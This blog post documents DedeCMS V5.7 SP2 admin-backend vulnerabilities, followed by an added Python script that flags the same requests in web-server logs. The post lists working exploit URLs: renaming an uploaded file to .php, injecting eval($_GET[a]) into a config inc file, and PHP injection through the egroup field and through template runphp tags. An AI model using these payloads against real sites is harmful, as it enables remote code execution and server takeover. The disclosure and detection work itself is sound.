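A Small Collection of DedeCMS V5.7 SP2 Admin Backend Vulnerabilities

Notes on several ways to get the server through the admin backend of the latest version of DedeCMS.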

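01. Uploading a shell

1. The flash file upload in the admin backend does not validate file contents, so a shell can be uploaded directly.
2. Through the rename function:

http://localhost/dede/file_manage_control.php?fmdo=rename&oldfilename=/uploads/media/xxx/xxxx.swf&newfilename=/sunu11.php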

02. Writing to configuration
In /dede/sys_verifies.php, malicious code can be written into an inc file.

1. http://localhost/dedecms/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//
2. http://localhost/dedecms/uploads/dede/sys_verifies.php?action=down&a=phpinfo();

03. Data written to the database is not filtered:

http://localhost/dedecms/uploads/dede/stepselect_main.php?action=addenum_save&ename=xxx&egroup=;phpinfo();$&issign=1

Query:

http://localhost/dedecms/uploads/dede/sys_cache_up.php?step=2&egroup=a=1;phpinfo();&dopost=ok
or:
http://localhost/data/enums/;phpinfo();$.php

05. Template issue:

http://localhost/dede/tag_test_action.php?url=a&token=xxxxx&partcode={dede:mochazz name='source' runphp='yes'}phpinfo();{/dede:mochazz}
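
Added example, not part of the original post: a log triage script that flags the request shapes listed above when they appear in web-server access logs. The suspicious character set and the rule labels are assumptions; the sample request targets are constructed from the URLs on this page plus one benign request.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

PHP_EXT = re.compile(r"\.(php\d?|phtml|pht)$", re.I)  # rename target the server would execute
CODE_CHARS = re.compile(r"[;()$\"'\\]")  # assumption: never legitimate in these parameters
has_code = lambda value: bool(CODE_CHARS.search(value))

# Admin script name -> (label, predicate over the decoded query parameters).
RULES = {
    "file_manage_control.php": ("rename-to-php", lambda q: q.get("fmdo") == "rename"
                                and bool(PHP_EXT.search(q.get("newfilename", "")))),
    "sys_verifies.php": ("refiles-code", lambda q: any(
        k.startswith("refiles[") and has_code(v) for k, v in q.items())),
    "stepselect_main.php": ("egroup-code", lambda q: has_code(q.get("egroup", ""))),
    "sys_cache_up.php": ("egroup-code", lambda q: has_code(q.get("egroup", ""))),
    "tag_test_action.php": ("partcode-runphp",
                            lambda q: "runphp" in q.get("partcode", "").lower()),
}

def parse_query(query):
    # Split on '&' only, so a ';' inside a value stays part of that value.
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def classify(request_target):
    """Return the labels of the rules matched by one request target (path?query)."""
    parts = urlsplit(request_target)
    script = unquote(parts.path).rsplit("/", 1)[-1]
    hits = []
    if script in RULES:
        label, predicate = RULES[script]
        if predicate(parse_query(parts.query)):
            hits.append(label)
    if "/data/enums/" in parts.path and has_code(script):
        hits.append("enum-cache-name")  # cache file named after an unfiltered egroup
    return hits

# Constructed sample: request targets from the URLs above plus one benign admin request.
SAMPLE = [
    "/dede/file_manage_control.php?fmdo=rename&oldfilename=/uploads/media/xxx/xxxx.swf&newfilename=/sunu11.php",
    r"/dedecms/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//",
    "/dedecms/uploads/dede/stepselect_main.php?action=addenum_save&ename=xxx&egroup=;phpinfo();$&issign=1",
    "/data/enums/;phpinfo();$.php",
    "/dede/tag_test_action.php?url=a&token=xxxxx&partcode={dede:mochazz%20name='source'%20runphp='yes'}phpinfo();{/dede:mochazz}",
    "/dede/stepselect_main.php?action=addenum_save&ename=city&egroup=nativeplace&issign=1",
]
for target in SAMPLE: print(classify(target), target[:60])
```

Feed `classify` the request field of each access-log line; any non-empty result on these admin scripts is worth reviewing together with the admin session that issued it.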

  • Post author: SuNu11
  • Post link: http://sunu11.com/2018/04/03/19/
  • Copyright Notice: All articles in this blog are licensed under BY-NC-SA unless stating additionally.